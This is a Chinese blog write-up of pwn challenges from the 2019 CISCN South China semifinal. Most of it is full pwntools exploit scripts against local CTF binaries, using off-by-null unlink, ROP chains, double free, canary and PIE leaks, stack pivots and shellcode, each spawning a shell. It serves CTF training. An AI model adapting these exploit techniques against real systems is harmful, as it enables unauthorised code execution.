2019CISCN华南赛区半决赛 pwn

最新推荐文章于 2024-06-14 17:40:03 发布
最新推荐文章于 2024-06-14 17:40:03 发布
阅读量836 收藏 1
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/103459258
版权

好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android  然后 刷刷这个华南赛区的pwn。

如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。

pwn1

这个题目真的很有意思  感觉出题人费心了

edit 函数已经给限制了

然后show 函数也限制了

 edit 函数🈶️一个 off by null 由于没有开pie 

 unlink 就变得很简单  

这里必须unlink到  32 的堆块位置,,, 要不然够不到key2   也没有 off by null key1

其他就没有啥说的了,,,,

就是off by null 

修改key2  off by null key1 

然后修改 free hook  就ok


from pwn import*
io=process("./pwn")
elf=ELF("./pwn")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
context.arch='amd64'
context.log_level = "debug"



def gdb_s():
	gdb.attach(io)
	pause()


def add(index,size,con):
	io.recvuntil("4.show")
	io.sendline("1")
	io.recvuntil("index:")
	io.sendline(str(index))
	io.recvuntil("size:")
	io.sendline(str(size))
	io.recvuntil("content:")
	io.send(con)

def dele(index):
	io.recvuntil("4.show")
	io.sendline("2")
	io.recvuntil("index:")
	io.sendline(str(index))

def edit(index,con):
	io.recvuntil("4.show")
	io.sendline("3")
	io.recvuntil("index:")
	io.sendline(str(index))
	io.recvuntil("content:")
	io.send(con)

def show(index):
	io.recvuntil("4.show")
	io.sendline('4')
	io.recvuntil("index:")
	io.sendline(str(index))

if __name__ =="__main__":
	add(10,0xf0,'1010'+'\n')
	bss_addr=0x6021E0
	heap_len=0x602060
	heap_addrs=0x6020E0
	#gdb_s()
	io.recvuntil("4.show")
	io.sendline("1")
	io.recvuntil("index:")
	io.sendline('16')
	io.recvuntil("size:")
	io.sendline(str(0xf8))
	io.recvuntil("gift: ")
	heap_addr=int(io.recvline(),16)-0x110
	
	log.success("heap_addr "+hex(heap_addr))
	io.recvuntil("content:")
	io.sendline("/bin/sh;")
	add(1,0xf8,"111"+'\n')
	add(2,0xf8,"222"+'\n')
	add(32,0xf8,"3232"+'\n')
	add(31,0xf8,"3131"+'\n')
	add(30,0xf8,"3030"+'\n')
	add(3,0xf8,"3333"+'\n')
	# index 32--> 0x6021c8
	#  key1=6022BC  key2=6022B8
	#unlink
	fd=heap_addrs+0x8*32-0x10-0x8
	payload=p64(0)+p64(0xf0)+p64(fd)+p64(fd+0x8)
	payload=payload.ljust(0xf0,'a')
	payload+=p64(0xf0)

	edit(32,payload)
	
	#gdb_s()
	dele(31)

	#gdb_s()
	#add(5,0xf8,'444'+'\n')
	#add(6,0xf8,'444'+'\n')
	#gdb_s()
	payload=p64(fd)*3+p64(elf.got['free'])
	payload=payload.ljust(0xf0,'a')
	payload+=p64(1)
	edit(32,payload)
	#gdb_s()
	#edit key2=1  key1=1
	show(32)
	#print io.recv
	io.recvline()
	leak=u64(io.recv(6).ljust(8,'\x00'))
	#print leak
	libc_base_addr=leak-libc.sym['free']
	#print libc_base_addr
	log.success("libc_base_addr "+hex(libc_base_addr))

	system_addr=libc_base_addr+libc.sym['system']
	free_hook_addr=libc_base_addr+libc.sym['__free_hook']

	payload=p64(free_hook_addr)*4
	payload=payload.ljust(0xf0,'a')
	payload+=p64(1)

	edit(30,payload)

	edit(30,p64(system_addr))	
	#gdb_s()
	#add(16,0xf8,"3333"+'\n')
	show(16)
	dele(16)


	io.interactive()
	io.close()

pwn3 

这个题目一看就知道是系统调用的 execve(/bin//sh,0,0)、

32位的情况是

 

eax   系统调用号载入, execve为0xb  ebx 第一个参数  ecx 第二个参数 pop edx 第三个参数 int 0x80

64位的

rax    系统调用号载入    传参依次是 RDI、RSI、RDX、R10、R8、R9  (和gcc 编译出64位函数传参一样,vs编译的RCX、RDX、R8、R9 )

32位是0xb  64是 0x3b

然后这个题目的rop 真难找,,,

最后的rdx,,,, 看了参考链接才找到


from pwn import*
io=process("./short")
elf=ELF("./short")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
context.arch='amd64'
context.log_level = "debug"

def gdb_s():
	gdb.attach(io)
	pause()


if __name__ =="__main__":
	main_addr=0x40051D
	syscall_ret=0x0000000000400517
	mov_eax_ret=0x00000000004004e3
	pop_rdi_ret=0x00000000004005a3
	pop_rsi_r15=0x00000000004005a1
	pop_r14_r15=0x00000000004005a0
	pop_r12_r13_r14_r15=0x000000000040059c
	pop_rbx_rbp_r12_r13_r14_r15=0x40059A
	mov_rdx_r13_rsi_r14_edi_r15_call=0x400580
	payload='a'*0x10+p64(main_addr)
	io.sendline(payload)


	leak_addr= u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))

	stack_addr=leak_addr-0x118
	#gdb_s()
	payload="/bin/sh\x00".ljust(0x10,'\x00')
	payload+=p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0)*2+p64(stack_addr+80)+p64(0)*3
	payload+=p64(mov_rdx_r13_rsi_r14_edi_r15_call)
	payload+=p64(mov_eax_ret)
	payload+=p64(pop_rsi_r15)+p64(0)*2
	payload+=p64(pop_rdi_ret)+p64(stack_addr-0x20)
	payload+=p64(syscall_ret)
	io.sendline(payload)




	io.interactive()
	io.close()

 

 

 

 

 

pwn4

就是一个简单的栈溢出,,,,只是用system 没有搞定 还是one 香


#encoding:utf-8
#!/upr/bin/env python
from pwn import *

io=process("./pwn3")
elf=ELF("./pwn3")
libc=ELF("/lib/i386-linux-gnu/libc-2.23.so")
context.log_level = "debug"
def debug():
    gdb.attach(io)
    pause()
if __name__ == '__main__':
    io.recvuntil("Welcome, my friend. What's your name?")
    io.sendline("a"*0x28)
    #debug()
    io.recvuntil('a'*0x28)
    io.recv(8)
    __exit_funcs_addr=u32(io.recv(4))
    log.success("__exit_funcs_addr "+hex(__exit_funcs_addr))
    libc_base_addr=__exit_funcs_addr-(0xf7ed03dc-0xf7d1e000)
    log.success("libc_base_addr "+hex(libc_base_addr))
    #payload='a'*0x28+p32(libc.search('/bin/sh').next()+libc_base_addr)+p32(libc.sym['system']+libc_base_addr)
    payload='a'*0x2c+p32(0x3ac5c+libc_base_addr)
    io.sendline(payload)

    io.interactive()
'''
0x3ac5c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3ac5e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3ac62 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3ac69 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x5fbc5 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL

0x5fbc6 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL

'''

pwn6 

很简单的double free

#encoding:utf-8
#!/usr/bin/env python 
from pwn import*
io=process("./pwn")
elf=ELF("./pwn")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level = "debug"

def gdb_s():
    gdb.attach(io)
    pause()

def add(size,name,call):
    io.recvuntil("choice:")
    io.sendline("1")
    io.recvuntil("Please input the size of compary's name\n")
    io.sendline(str(size))
    io.recvuntil("please input name:\n")
    io.send(name)
    io.recvuntil("please input compary call:\n")
    io.send(call)

def call(index):
    io.recvuntil("choice:")
    io.sendline("3")
    io.recvuntil("Please input the index:\n")
    io.sendline(str(index))

def show(index):
    io.recvuntil("choice:")
    io.sendline("2")
    io.recvuntil("Please input the index:\n")
    io.sendline(str(index))



if __name__ =="__main__":
    add(0x18,"a"*8,"b"*8)#0
    add(0x80,"c"*8,"d"*8)#1
    add(0x80,"e"*8,"f"*8)#2
    for i in range(8):
        call(1)
    call(0)
    add(0x80,'k'*8,'g'*8)
    #gdb_s()
    show(3)
    leak_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
    log.success("leak_addr "+hex(leak_addr))

    libc_base_addr=leak_addr-(0x7f274f806ca0-0x7f274f41b000)
    log.success("libc_base_addr "+hex(libc_base_addr))
    free_hook_addr=libc_base_addr+libc.sym['__free_hook']
    system_addr=libc_base_addr+libc.sym['system']
    add(0x40,'444','5555')
    add(0x40,'6666','777777')
    add(0x40,'pppp','pppp')
    call(4)
    call(5)
    call(4)
    #gdb_s()
    add(0x40,p64(free_hook_addr),'w')
    add(0x40,"/bin/sh\x00",'p')
    add(0x40,"/bin/sh\x00",'p')
    add(0x40,p64(system_addr),'x')
    call(8)

    io.interactive()
    io.close()

pwn7

这个题 保护全开 一开始看c++的时候 感觉还挺恶心  后来发现 也就是个rop题目 只不过 先要泄漏出piebase 

柳暗花明又一村的 一幕就是 上一层的 堆栈里面有这个

但是泄漏libc的话 还是rop 泄漏 死于长度 = =

最后栈转移 执行rop


from pwn import*

elf=ELF("./babypwn")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
context.log_level = "debug"

while True:
	try:
		io=process("./babypwn")


		def gdb_s():
			gdb.attach(io)
			pause()

		if __name__ =="__main__":
			go_str=""
			ls="admin"
			for i in range(len(ls)):
				go_str+=chr(i^ord(ls[i]))
			#gdb_s()
			io.recvuntil("please input your name\n")
			io.sendline(go_str)
			#gdb_s()
			io.recvuntil("do you want to get something???\n")
			io.sendline('a'*0x18)
			io.recvuntil('a'*0x18)
			canary=u64(io.recv(8))-0xa
			log.success("canary "+hex(canary))
			stack_addr = u64(io.recv(6).ljust(8,"\x00"))-0x28
			log.success("stack_addr "+hex(stack_addr))	


				#io.recv
			io.recvuntil("OK???\n")
			payload='a'*0x10
			io.send(payload)
			io.recvuntil("I think you can do something now\n")
			payload='a'*0x28+p64(canary)+'c'*0x8+"\xde\x50"
			io.send(payload)
			#io.recv()
			io.recvuntil("do you want to get something???\n")
			io.send("a"*0x18)
			io.recvuntil("OK???\n")
			#gdb_s()
			io.send("a"*0x29)
			#print io.recv()
			io.recvuntil('c'*0x8)

			piebase = u64(io.recv(6).ljust(8,"\x00"))-0x1440

			log.success("piebase "+hex(piebase))

			printf_got=elf.got["printf"]+piebase
			printf_plt=elf.plt["printf"]+piebase
			read_got=elf.got["read"]+piebase

			io.recvuntil("I think you can do something now\n")

			pop_rdi_ret=piebase+0x14a3
			leave_ret=piebase+0x10dc
			sub_10DE = piebase+0x10de

			pause()

			payload = "a"*0x8+p64(pop_rdi_ret)+p64(read_got)+p64(printf_plt)
			payload +=p64(sub_10DE)+p64(canary)+p64(stack_addr)+p64(leave_ret)

			io.send(payload)

			#print io.recv()

			libc_base_address = u64(io.recv(6).ljust(8,"\x00"))-libc.sym["read"]
			log.success("libc_base_address "+hex(libc_base_address))

			sysytem_addr=libc.sym['system']+libc_base_address
			#gdb_s()
			io.recvuntil("do you want to get something???\n")
			#piedebug(0x11fe)
			io.sendline("a"*0x8)
			io.recvuntil("OK???\n")
			io.sendline("a"*0x8)
			io.recvuntil("I think you can do something now\n")


			payload='/bin/sh;'+p64(pop_rdi_ret)+p64(stack_addr)+p64(sysytem_addr)
			payload+=p64(0)+p64(canary)+p64(stack_addr-0x10)+p64(leave_ret)

			io.send(payload)

			io.interactive()
			io.close()

	except:
		io.close()

 

pwn8

这个直接用  ropgadget  --binary ./easy_pwn --ropchain 就可以了

 


#encoding:utf-8
#!/upr/bin/env python
from pwn import *
from struct import pack
io=process("./easy_pwn")
elf=ELF("./easy_pwn")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
context.log_level = "debug"
def debug():
    gdb.attach(io)
    pause()
if __name__ == '__main__':
    p = ''

    p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ba0e0) # @ .data
    p += pack('<Q', 0x0000000000449b9c) # pop rax ; ret
    p += '/bin//sh'
    p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
    p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
    p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
    p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
    p += pack('<Q', 0x00000000004006e6) # pop rdi ; ret
    p += pack('<Q', 0x00000000006ba0e0) # @ .data
    p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
    p += pack('<Q', 0x0000000000449bf5) # pop rdx ; ret
    p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
    p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
    p += pack('<Q', 0x0000000000449b9c) # pop rax; ret
    p+=p64(59)
    p += pack('<Q', 0x000000000040139c) # syscall


    payload='a'*0x50

    for i in p:
        payload+=chr(ord(i)^0x66)

    io.recv()
    #debug()
    io.sendline(payload)

    io.interactive()

pwn9

这个题目应该算是简单的 jmp esp 在windows 下的溢出里面很常见 

当看到hint 这个函数有jmp esp  并且 什么保护都没有开的时候 我就感觉这个题目很简单

 


from pwn import*
io=process("./pwn")
elf=ELF("./pwn")
context.log_level = "debug"

def gdb_s():
	gdb.attach(io)
	pause()



if __name__ =="__main__":
	jmp_addr=0x8048554
	pay=asm("xor    eax,eax")
	pay+=asm("push   eax")
	pay+=asm("push   0x68732f2f")
	pay+=asm("push   0x6e69622f")
	pay+=asm("mov    ebx,esp")
	pay+=asm("mov    ecx,eax")
	pay+=asm("mov    edx,eax")
	pay+=asm("mov    al,0xb")
	pay+=asm("int    0x80")
	#print len(pay)
	payload=pay.ljust(0x24,'\x00')
	payload+=p32(jmp_addr)
	#gdb_s()
	payload+=asm("sub esp,0x28")
	payload+=asm("call esp")
	io.sendline(payload)
	




	io.interactive()
	io.close()

参考链接

https://xz.aliyun.com/t/5517

pipixia233333
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1150
CISCN2021pwn pwny(数组越界,劫持exit_hook)
2024全国大学生信息安全竞赛(ciscn半决赛华南赛区Pwn题解
最新发布
返璞归真的博客
06-14 642
2024全国大学生信息安全竞赛(ciscn半决赛华南赛区Pwn题解
[XCTF-pwn] 17-supermarket
weixin_52640415的博客
03-02 202
漏洞: 在edit_desc里realloc后没有写回新指针 int edit_desc() { int v1; // [esp+8h] [ebp-10h] int size; // [esp+Ch] [ebp-Ch] v1 = get_idx_by_name(); if ( v1 == -1 ) return puts("not exist"); for ( size = 0; size <= 0 || size > 256; size = get_int(
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
PWN2019-ciscn your——pwn
Joaus的博客
05-05 862
这题的漏洞点就在数组下标越界,造成栈上任意地址读写。 在做的时候遇到的坑点: 1.在于数组类型转换输出会造成误导: 2.对不给libc.so的题可以用libcsearch和onegadget配合得到onegadget地址,因为我直接调用system函数会出现段错误,应该是在对栈上数据进行操作覆盖了环境变量???但是用onegadget就成功getshelll。 from LibcSearcher...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
CISCN 2020 Final Day2 pwn3思路分享 .pdf
09-05
CISCN 2020 Final Day2 pwn3思路分享》 本文主要探讨的是在CISCN 2020网络安全大赛第二天的pwn3挑战中的解题思路,涉及的是利用漏洞进行安全对抗的技术。该挑战的核心在于对二进制程序的深入理解和巧妙利用,以...
网鼎杯2020半决赛awdplus题目
12-07
"网鼎杯2020半决赛awdplus题目"是一个针对网络安全竞赛的专题,主要涉及的是Pwn(破解)和Web(网页安全)两类挑战。这类比赛通常旨在测试参赛者的逆向工程、代码审计、漏洞利用以及网络攻防技能。下面我们将详细...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 365
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
2019CISCN华中赛区分区赛部分wp
一筐萝卜的博客
06-03 1412
pwn1 64位程序,只开启了NX(栈不可执行)保护,试着运行发现是一个菜单题,选项二、三没用 拖到IDA中查看,发现在encrypt选项中存在gets造成的栈溢出漏洞 不过输进去的字符串被分段异或了,我们可以先进性异或一下,然后在输入程序中,程序再异或一下就是我们想要的payload了 当时写脚本的时候发现流程劫持后,第二次发送payload的时候,payload没有被程序异或,直接打就可以...
pwnciscn_2019_es_2
Nothing
12-24 2763
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1296
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
2019-CISCN华南赛区半决赛 pwn8
像初雪一样自由洒落
02-22 439
参考博客:https://xz.aliyun.com/t/5517#toc-3 学长给了这道题目,结合了逆向+pwn 64位的程序,是静态链接的,静态!可以直接构造rop链了 就开启了nx保护 执行的时候发现权限不够,直接给他加权限就可以,chmod +x easy_pwn 执行 emm,要把文件拖入桌面然后放入ida里面,因为桌面是C盘,有管理...
pwnable.tw dubblesort
weixin_30896511的博客
03-15 192
(留坑,远程没打成功) int __cdecl main(int argc, const char **argv, const char **envp) { int t_num_count; // eax int *num_stack; // edi unsigned int input_count; // esi unsigned int output_ptr; ...
180509 Pwn-ISCC(Pwn2)
whklhhhh的博客
05-25 866
写作Pwn3读作Pwn2 23333 打开pwn3反编译,发现菜单,很明显是堆的题目了 看了一下在free的时候没有清空指针,造成野指针 以我浅薄的知识猜想是double free吧 参考ctf-wiki的fastbin-attack 主要漏洞在于通过fastbin管理堆的情况下,在free时仅会检查链表头部(即main_arena指向)的chunk 第一次释放free(chun...
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 814
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2273
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值